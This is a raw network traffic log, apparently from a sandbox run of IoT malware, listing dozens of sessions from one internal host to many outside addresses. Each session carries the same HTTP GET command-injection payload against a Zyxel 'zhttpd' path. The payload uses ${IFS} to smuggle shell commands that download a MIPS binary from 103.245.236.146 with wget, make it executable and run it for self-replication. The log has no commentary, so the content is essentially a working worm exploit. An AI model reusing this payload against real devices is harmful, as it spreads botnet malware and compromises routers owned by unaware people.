                                              Jan 29, 2024 07:04:00.209095955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6847192.168.2.1437248149.136.179.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209129095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6848192.168.2.1437444144.4.125.61443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209157944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6849192.168.2.145803047.58.161.72443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209207058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6850192.168.2.143981025.59.236.119443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209252119 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6851192.168.2.144021224.199.249.74443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209275007 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6852192.168.2.143515085.239.97.34443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209304094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6853192.168.2.1434842197.17.165.45443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209361076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6854192.168.2.1441816181.143.42.148443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209383011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6855192.168.2.1455614173.242.250.137443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209449053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6856192.168.2.1434248119.55.51.67443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209470034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6857192.168.2.144903471.102.189.209443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209482908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6858192.168.2.1441154184.189.20.213443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209496975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6859192.168.2.144347665.156.105.18443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209537029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6860192.168.2.1454062195.77.130.31443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209563971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6861192.168.2.1435280138.240.83.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209620953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6862192.168.2.1440138164.142.154.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209655046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6863192.168.2.1440622183.226.143.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209692001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6864192.168.2.143674457.181.211.184443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209743023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6865192.168.2.144602081.92.136.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209769964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6866192.168.2.1454384170.243.80.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209808111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6867192.168.2.1439126213.224.97.77443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209878922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6868192.168.2.1435588131.56.97.46443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209882021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6869192.168.2.1436750163.241.244.182443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209937096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6870192.168.2.1449198190.84.17.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.209975958 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6871192.168.2.143937486.250.217.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210014105 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6872192.168.2.1452188142.115.47.22443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210057020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6873192.168.2.14566088.227.105.157443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210104942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6874192.168.2.1441378132.66.248.176443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210139990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6875192.168.2.144481867.117.25.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210195065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6876192.168.2.1456714172.187.200.220443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210244894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6877192.168.2.1438068125.243.116.152443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210280895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6878192.168.2.1456294184.22.182.146443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210329056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6879192.168.2.1448536111.187.216.105443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210366964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6880192.168.2.1443228190.160.34.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210391998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6881192.168.2.1455588221.242.45.166443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210417032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6882192.168.2.1456924222.56.77.239443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210470915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6883192.168.2.145812248.93.122.81443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210496902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6884192.168.2.1435914157.36.254.190443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210525036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6885192.168.2.1441108102.95.55.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210549116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6886192.168.2.1448746129.186.38.179443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210591078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6887192.168.2.145211834.117.136.155443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210617065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6888192.168.2.144954640.13.198.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210655928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6889192.168.2.1433022113.137.233.218443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210678101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6890192.168.2.1454568133.112.150.9443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210738897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6891192.168.2.1458018114.244.55.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210761070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6892192.168.2.1437760148.26.138.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210798979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6893192.168.2.144622043.160.1.226443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210824013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6894192.168.2.144351854.35.250.26443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210843086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6895192.168.2.1451548216.96.220.192443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210901022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6896192.168.2.144065870.185.113.129443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210941076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6897192.168.2.1442938197.68.51.156443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210978031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6898192.168.2.1444780148.175.125.91443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.210994959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6899192.168.2.1444042152.182.185.201443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211025953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6900192.168.2.1435518163.141.202.49443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211061001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6901192.168.2.144849064.235.173.47443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211098909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6902192.168.2.145571072.236.244.130443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211131096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6903192.168.2.1435570221.204.150.113443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211183071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6904192.168.2.144329467.235.123.172443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211199999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6905192.168.2.1442446201.180.54.79443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211230040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6906192.168.2.145644038.144.7.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211273909 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6907192.168.2.1435642159.171.173.99443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211304903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6908192.168.2.1456806166.208.48.150443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211354017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6909192.168.2.145602884.204.56.4443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:00.211364031 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              6910192.168.2.144592461.105.72.30443
                                              TimestampBytes transferredDirectionData
